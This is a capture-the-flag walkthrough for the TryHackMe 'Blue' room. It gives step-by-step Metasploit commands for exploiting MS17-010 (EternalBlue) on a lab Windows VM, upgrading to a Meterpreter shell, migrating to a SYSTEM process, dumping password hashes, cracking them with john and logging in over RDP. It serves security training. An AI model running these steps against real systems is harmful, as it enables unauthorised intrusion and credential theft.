Blue

Blue

Blue is the second room in the Offensive Security path on TryHackMe. Below is my walkthrough for the tasks for this room.

Task 1 Hints
  • Have you deployed the machine and clicked on complete?
  • What popular port scanner can be used to answer the 2nd and 3rd questions for this task?
Task 2 Hints
  • Follow the information mentioned and launch Metasploit
  • How do you search for exploits in Metasploit?
  • What would you search for in this case?
Task 3 Hints
  • What post exploitation modules can be used to convert a TCP Shell to Meterpreter (Google it!)
  • Make sure you set the appropriate options!
  • Make sure your migrate step utilizes the correct system architecture.
Task 4 Hints
  • Two popular tools can be used to crack this password with a rather popular password list.
  • Make sure to indicate the correct hash format to crack the password.
Task 5 Hints
  • Follow the hints provided to uncover the 3 flags!

Walkthrough

Full Walkthrough

Task 1

Question 1

No answer is needed, just deploy the machine!

Question 2

Blue Task 1 Question 2

This can easily be answered by running:

threader3000

This will supply all of the open TCP ports on the box:

Blue threader3000

Based on the results, the answer is 3 open ports (135, 139, 445).

Question 3

Blue Task 1 Question 3

Let’s run nmap on this box with the following parameters:

nmap -p135,139,445 --script vuln <victim ip>

This will run the vuln script in nmap and return results based on vulnerabilities uncovered.

Blue nmap vuln script

In the output above, you will see both the CVE for this vulnerability (CVE-2017-0143) and the name designation from Microsoft (ms17-010), which is the answer to this question.

Task 2

Question 1

No answer needed, just launch Metasploit with:

msfconsole

Question 2

Blue Task 2 Question 2

Once Metasploit has been launched, run the following to see all the exploits for the ms17-010 vulnerability:

search ms17-010

Several results will appear as shown below:

Blue metasploit search ms17-010

The answer to this question is option 2 on this list exploit/windows/smb/ms17_010_eternalblue.

Question 3

The next question asks you which option needs to be set for this exploit:

Blue Task 2 Question 3

This can be found by running the following within Metasploit:

show options

Blue metasploit show options

The answer is RHOSTS as that is the only option that is not set by default. Set RHOSTS by using:

set RHOSTS <victim ip>

and then set your LHOST to your VPN IP address by running the following:

set LHOSTS tun0

Blue metasploit set rhosts lhost

Question 4

With this set, type in either:

run or exploit

You should see output similar to that shown below:

Blue metasploit eternalblue exploit

Question 5

No answer is needed for this task. This exploit doesn’t work 100% of the time so it is letting you know you may have to reboot the VM and try again.

Task 3

Question 1

Blue Task 3 Question 1

As mentioned above, background your shell with:

CTRL + Z and then answer y to the prompt to background your session.

Blue metasploit background session 1

For the post exploitation module, I did some Googling on shell to meterpreter, and came across this article, which provides the answer to this question (post/multi/manage/shell_to_meterpreter).

Blue metasploit post exploitation shell to meterpreter

Question 2

Blue Task 3 Question 2

This next section asks you which option we’re required to change. Let’s run:

show options and you will notice a SESSION field.

Blue metasploit shell to meterpreter show options

Question 3

This needs to be modified to match the session number of your backgrounded session. Set this with:

set SESSION <session #>

Blue metasploit set session

Once done, use either:

run

or

exploit

to gain a Meterpreter shell.

Question 4

No answer needed, if this doesn’t work, you might have to redo all of the prior steps in Metasploit.

Question 5

In order to know which session to select, run sessions -l to list all current active sessions in Metasploit.

Blue metasploit list active sessions

You will notice 2 sessions: 1 with your reverse TCP shell, and another one with your Meterpreter shell. In this case, run the following to interact with the Meterpreter shell:

sessions -i 2

Question 6

This question asks you to run:

shell

to launch a shell on the remote machine followed by:

whoami

to confirm you are the NT AUTHORITY\SYSTEM user.

Blue metasploit interact with session

Question 7

Next, let’s background this shell with:

CTRL+Z followed by y

Next, run:

ps

to list processes running on the victim machine:

Blue metasploit ps

Question 8

We are looking for a service that can be migrated to that is running as NT AUTHORITY\SYSTEM to find a process that is running as this user (as the service we are utilizing likely is not). Be mindful that the architecture of the service would need to match that of your shell (x64 in this case). This may take a few attempts to migrate to a process as it may fail. Migration is attempted with:

migrate <PID>

where PID is the process ID listed in the first column of the list from the ps command. A successful migration (after a few attempts) is shown below:

Blue metasploit migrate

Task 4

Question 1

Next, we’re going to dump all the passwords on the victim machine. Follow the information provided in the question as shown below and run:

hashdump

Blue metasploit hashdump

You should see output similar to that shown below, and there is one non-default user listed in this case, Jon.

Blue metasploit hashdump

Question 2

Blue Task 4 Question 2

Let’s crack this password with john. First, on your attacker machine, copy the full line with the Jon user listed and echo it into a file with:

echo Jon:1000:....::: > hashes

To echo the hash into the hashes file. Next, let’s run:

john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=NT

This will attempt to crack the NT hash with the rockyou wordlist. After a couple minutes, the user’s password will be displayed:

Blue John

Task 5

Question 1

Let’s connect to this machine with Remote Desktop with remmina. Fill in the IP address of your victim machine once launched along with the user (Jon) and his password you cracked in the previous question.

Blue Remmina rdp

After a couple moments, you will be presented with Jon’s desktop as shown below.

Blue Remmina Windows Desktop

Let’s start looking for flags.

Blue Task 5 Question 1

On Windows, the root of the system is typically C:. Let’s open File Explorer and look around:

Blue flag1

The first flag is located here in the flag1.txt file.

Question 2

Blue Task 5 Question 2

This also provides a hint, this can be located at C:\Windows\System32\config

Blue flag2

Question 3

Blue Task 5 Question 3

The final flag is located at C:\Users\Jon\My Documents (as Jon is an administrator).

Blue flag3

That’s it! All flags have been uncovered!